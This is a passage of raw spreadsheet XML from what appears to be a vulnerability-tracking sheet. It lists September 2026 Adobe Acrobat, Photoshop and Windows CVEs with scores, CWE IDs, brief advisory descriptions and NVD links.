t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L664" s="5" t="inlineStr" /><c r="M664" s="5" t="inlineStr" /><c r="N664" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P664" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q664" s="5" t="inlineStr" /><c r="R664" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S664" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T664" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t></is></c></row><row r="665"><c r="A665" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B665" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C665" s="5" t="inlineStr"><is><t>CVE-2026-81988</t></is></c><c r="D665" s="5" t="n"><v>7.8</v></c><c r="E665" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F665" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G665" s="5" t="inlineStr" /><c r="H665" s="5" t="n"><v>0.002</v></c><c r="I665" s="5" t="inlineStr" /><c r="J665" s="5" t="inlineStr" /><c r="K665" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L665" s="5" t="inlineStr" /><c r="M665" s="5" t="inlineStr" /><c r="N665" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P665" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q665" s="5" t="inlineStr" /><c r="R665" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S665" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T665" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t></is></c></row><row r="666"><c r="A666" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B666" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C666" s="5" t="inlineStr"><is><t>CVE-2026-81989</t></is></c><c r="D666" s="5" t="n"><v>7.8</v></c><c r="E666" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F666" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G666" s="5" t="inlineStr" /><c r="H666" s="5" t="n"><v>0.002</v></c><c r="I666" s="5" t="inlineStr" /><c r="J666" s="5" t="inlineStr" /><c r="K666" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L666" s="5" t="inlineStr" /><c r="M666" s="5" t="inlineStr" /><c r="N666" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P666" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q666" s="5" t="inlineStr" /><c r="R666" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S666" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T666" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t></is></c></row><row r="667"><c r="A667" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B667" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C667" s="5" t="inlineStr"><is><t>CVE-2026-81990</t></is></c><c r="D667" s="5" t="n"><v>7.8</v></c><c r="E667" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F667" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G667" s="5" t="inlineStr" /><c r="H667" s="5" t="n"><v>0.002</v></c><c r="I667" s="5" t="inlineStr" /><c r="J667" s="5" t="inlineStr" /><c r="K667" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L667" s="5" t="inlineStr" /><c r="M667" s="5" t="inlineStr" /><c r="N667" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O667" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P667" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q667" s="5" t="inlineStr" /><c r="R667" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S667" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T667" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t></is></c></row><row r="668"><c r="A668" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B668" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C668" s="5" t="inlineStr"><is><t>CVE-2026-81992</t></is></c><c r="D668" s="5" t="n"><v>7.8</v></c><c r="E668" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F668" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G668" s="5" t="inlineStr" /><c r="H668" s="5" t="n"><v>0.002</v></c><c r="I668" s="5" t="inlineStr" /><c r="J668" s="5" t="inlineStr" /><c r="K668" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L668" s="5" t="inlineStr" /><c r="M668" s="5" t="inlineStr" /><c r="N668" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O668" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P668" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q668" s="5" t="inlineStr" /><c r="R668" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S668" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T668" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t></is></c></row><row r="669"><c r="A669" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B669" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C669" s="5" t="inlineStr"><is><t>CVE-2026-82005</t></is></c><c r="D669" s="5" t="n"><v>7.8</v></c><c r="E669" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F669" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G669" s="5" t="inlineStr" /><c r="H669" s="5" t="n"><v>0.002</v></c><c r="I669" s="5" t="inlineStr" /><c r="J669" s="5" t="inlineStr" /><c r="K669" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L669" s="5" t="inlineStr" /><c r="M669" s="5" t="inlineStr" /><c r="N669" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O669" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P669" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q669" s="5" t="inlineStr" /><c r="R669" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S669" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T669" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t></is></c></row><row r="670"><c r="A670" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B670" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C670" s="5" t="inlineStr"><is><t>CVE-2026-82006</t></is></c><c r="D670" s="5" t="n"><v>7.8</v></c><c r="E670" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F670" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G670" s="5" t="inlineStr" /><c r="H670" s="5" t="n"><v>0.002</v></c><c r="I670" s="5" t="inlineStr" /><c r="J670" s="5" t="inlineStr" /><c r="K670" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L670" s="5" t="inlineStr" /><c r="M670" s="5" t="inlineStr" /><c r="N670" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O670" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P670" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q670" s="5" t="inlineStr" /><c r="R670" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S670" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T670" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t></is></c></row><row r="671"><c r="A671" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B671" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C671" s="5" t="inlineStr"><is><t>CVE-2026-82007</t></is></c><c r="D671" s="5" t="n"><v>7.8</v></c><c r="E671" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F671" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G671" s="5" t="inlineStr" /><c r="H671" s="5" t="n"><v>0.002</v></c><c r="I671" s="5" t="inlineStr" /><c r="J671" s="5" t="inlineStr" /><c r="K671" s="5" t="inlineStr"><is><t>adobe:photoshop, apple:macos, microsoft:windows</t></is></c><c r="L671" s="5" t="inlineStr" /><c r="M671" s="5" t="inlineStr" /><c r="N671" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O671" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P671" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q671" s="5" t="inlineStr" /><c r="R671" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S671" s="5" t="inlineStr"><is><t>Photoshop Desktop is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T671" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t></is></c></row><row r="672"><c r="A672" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B672" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C672" s="5" t="inlineStr"><is><t>CVE-2026-83498</t></is></c><c r="D672" s="5" t="n"><v>7.8</v></c><c r="E672" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F672" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G672" s="5" t="inlineStr" /><c r="H672" s="5" t="n"><v>0.003</v></c><c r="I672" s="5" t="inlineStr" /><c r="J672" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K672" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L672" s="5" t="inlineStr" /><c r="M672" s="5" t="inlineStr" /><c r="N672" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P672" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q672" s="5" t="inlineStr" /><c r="R672" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S672" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T672" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t></is></c></row><row r="673"><c r="A673" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B673" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C673" s="5" t="inlineStr"><is><t>CVE-2026-83942</t></is></c><c r="D673" s="5" t="n"><v>7.8</v></c><c r="E673" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F673" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G673" s="5" t="inlineStr" /><c r="H673" s="5" t="n"><v>0.002</v></c><c r="I673" s="5" t="inlineStr" /><c r="J673" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K673"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673" s="5" t="inlineStr" /><c r="M673" s="5" t="inlineStr" /><c r="N673" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P673" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q673" s="5" t="inlineStr" /><c r="R673" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S673" s="5" t="inlineStr"><is><t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T673" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t></is></c></row><row r="674"><c r="A674" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B674" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C674" s="5" t="inlineStr"><is><t>CVE-2026-83952</t></is></c><c r="D674" s="5" t="n"><v>7.8</v></c><c r="E674" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F674" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G674" s="5" t="inlineStr" /><c r="H674" s="5" t="n"><v>0.002</v></c><c r="I674" s="5" t="inlineStr" /><c r="J674" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K674" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L674" s="5" t="inlineStr" /><c r="M674" s="5" t="inlineStr" /><c r="N674" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O674" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P674" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q674" s="5" t="inlineStr" /><c r="R674" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S674" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T674" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t></is></c></row><row r="675"><c r="A675" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B675" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C675" s="5" t="inlineStr"><is><t>CVE-2026-83954</t></is></c><c r="D675" s="5" t="n"><v>7.8</v></c><c r="E675" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F675" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G675" s="5" t="inlineStr" /><c r="H675" s="5" t="n"><v>0.003</v></c><c r="I675" s="5" t="inlineStr" /><c r="J675" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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5" s="5" t="inlineStr" /><c r="M675" s="5" t="inlineStr" /><c r="N675" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O675" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P675" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q675" s="5" t="inlineStr" /><c r="R675" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S675" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T675" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t></is></c></row><row r="676"><c r="A676" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B676" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C676" s="5" t="inlineStr"><is><t>CVE-2026-83955</t></is></c><c r="D676" s="5" t="n"><v>7.8</v></c><c r="E676" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F676" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G676" s="5" t="inlineStr" /><c r="H676" s="5" t="n"><v>0.002</v></c><c r="I676" s="5" t="inlineStr" /><c r="J676" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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6" s="5" t="inlineStr" /><c r="M676" s="5" t="inlineStr" /><c r="N676" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O676" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P676" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q676" s="5" t="inlineStr" /><c r="R676" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S676" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T676" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t></is></c></row><row r="677"><c r="A677" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B677" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C677" s="5" t="inlineStr"><is><t>CVE-2026-83967</t></is></c><c r="D677" s="5" t="n"><v>7.8</v></c><c r="E677" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F677" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G677" s="5" t="inlineStr" /><c r="H677" s="5" t="n"><v>0.003</v></c><c r="I677" s="5" t="inlineStr" /><c r="J677" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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7" s="5" t="inlineStr" /><c r="M677" s="5" t="inlineStr" /><c r="N677" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O677" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P677" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q677" s="5" t="inlineStr" /><c r="R677" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S677" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T677" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t></is></c></row><row r="678"><c r="A678" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B678" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C678" s="5" t="inlineStr"><is><t>CVE-2026-83968</t></is></c><c r="D678" s="5" t="n"><v>7.8</v></c><c r="E678" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F678" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G678" s="5" t="inlineStr" /><c r="H678" s="5" t="n"><v>0.003</v></c><c r="I678" s="5" t="inlineStr" /><c r="J678" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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8" s="5" t="inlineStr" /><c r="M678" s="5" t="inlineStr" /><c r="N678" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O678" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P678" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q678" s="5" t="inlineStr" /><c r="R678" s="5" t="inlineStr"><is><t>CWE-400, CWE-416</t></is></c><c r="S678" s="5" t="inlineStr"><is><t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T678" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83968</t></is></c></row><row r="679"><c r="A679" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B679" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C679" s="5" t="inlineStr"><is><t>CVE-2026-83969</t></is></c><c r="D679" s="5" t="n"><v>7.8</v></c><c r="E679" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F679" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G679" s="5" t="inlineStr" /><c r="H679" s="5" t="n"><v>0.002</v></c><c r="I679" s="5" t="inlineStr" /><c r="J679" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K67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79" s="5" t="inlineStr" /><c r="M679" s="5" t="inlineStr" /><c r="N679" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O679" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P679" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q679" s="5" t="inlineStr" /><c r="R679" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S679" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T679" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83969</t></is></c></row><row r="680"><c r="A680" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B680" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C680" s="5" t="inlineStr"><is><t>CVE-2026-83970</t></is></c><c r="D680" s="5" t="n"><v>7.8</v></c><c r="E680" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F680" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G680" s="5" t="inlineStr" /><c r="H680" s="5" t="n"><v>0.003</v></c><c r="I680" s="5" t="inlineStr" /><c r="J680" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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0" s="5" t="inlineStr" /><c r="M680" s="5" t="inlineStr" /><c r="N680" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O680" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P680" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q680" s="5" t="inlineStr" /><c r="R680" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S680" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T680" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83970</t></is></c></row><row r="681"><c r="A681" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B681" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C681" s="5" t="inlineStr"><is><t>CVE-2026-83971</t></is></c><c r="D681" s="5" t="n"><v>7.8</v></c><c r="E681" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F681" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G681" s="5" t="inlineStr" /><c r="H681" s="5" t="n"><v>0.003</v></c><c r="I681" s="5" t="inlineStr" /><c r="J681" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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1" s="5" t="inlineStr" /><c r="M681" s="5" t="inlineStr" /><c r="N681" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O681" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P681" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q681" s="5" t="inlineStr" /><c r="R681" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S681" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T681" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83971</t></is></c></row><row r="682"><c r="A682" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B682" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C682" s="5" t="inlineStr"><is><t>CVE-2026-83972</t></is></c><c r="D682" s="5" t="n"><v>7.8</v></c><c r="E682" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F682" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G682" s="5" t="inlineStr" /><c r="H682" s="5" t="n"><v>0.003</v></c><c r="I682" s="5" t="inlineStr" /><c r="J682" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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2" s="5" t="inlineStr" /><c r="M682" s="5" t="inlineStr" /><c r="N682" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O682" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P682" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q682" s="5" t="inlineStr" /><c r="R682" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S682" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T682" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83972</t></is></c></row><row r="683"><c r="A683" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B683" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C683" s="5" t="inlineStr"><is><t>CVE-2026-83973</t></is></c><c r="D683" s="5" t="n"><v>7.8</v></c><c r="E683" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F683" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G683" s="5" t="inlineStr" /><c r="H683" s="5" t="n"><v>0.003</v></c><c r="I683" s="5" t="inlineStr" /><c r="J683" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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3" s="5" t="inlineStr" /><c r="M683" s="5" t="inlineStr" /><c r="N683" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O683" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P683" s="5" t="inlineStr"><is><t>2026-09-12</t></is></c><c r="Q683" s="5" t="inlineStr" /><c r="R683" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S683" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T683" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83973</t></is></c></row><row r="684"><c r="A684" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B684" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C684" s="5" t="inlineStr"><is><t>CVE-2026-83974</t></is></c><c r="D684" s="5" t="n"><v>7.8</v></c><c r="E684" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F684" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G684" s="5" t="inlineStr" /><c r="H684" s="5" t="n"><v>0.002</v></c><c r="I684" s="5" t="inlineStr" /><c r="J684" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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4" s="5" t="inlineStr" /><c r="M684" s="5" t="inlineStr" /><c r="N684" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O684" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P684" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q684" s="5" t="inlineStr" /><c r="R684" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S684" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T684" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83974</t></is></c></row><row r="685"><c r="A685" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B685" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C685" s="5" t="inlineStr"><is><t>CVE-2026-83975</t></is></c><c r="D685" s="5" t="n"><v>7.8</v></c><c r="E685" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F685" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G685" s="5" t="inlineStr" /><c r="H685" s="5" t="n"><v>0.003</v></c><c r="I685" s="5" t="inlineStr" /><c r="J685" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K68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5" s="5" t="inlineStr" /><c r="M685" s="5" t="inlineStr" /><c r="N685" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O685" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P685" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q685" s="5" t="inlineStr" /><c r="R685" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S685" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T685" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83975</t></is></c></row><row r="686"><c r="A686" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B686" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C686" s="5" t="inlineStr"><is><t>CVE-2026-83976</t></is></c><c r="D686" s="5" t="n"><v>7.8</v></c><c r="E686" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F686" s="5" 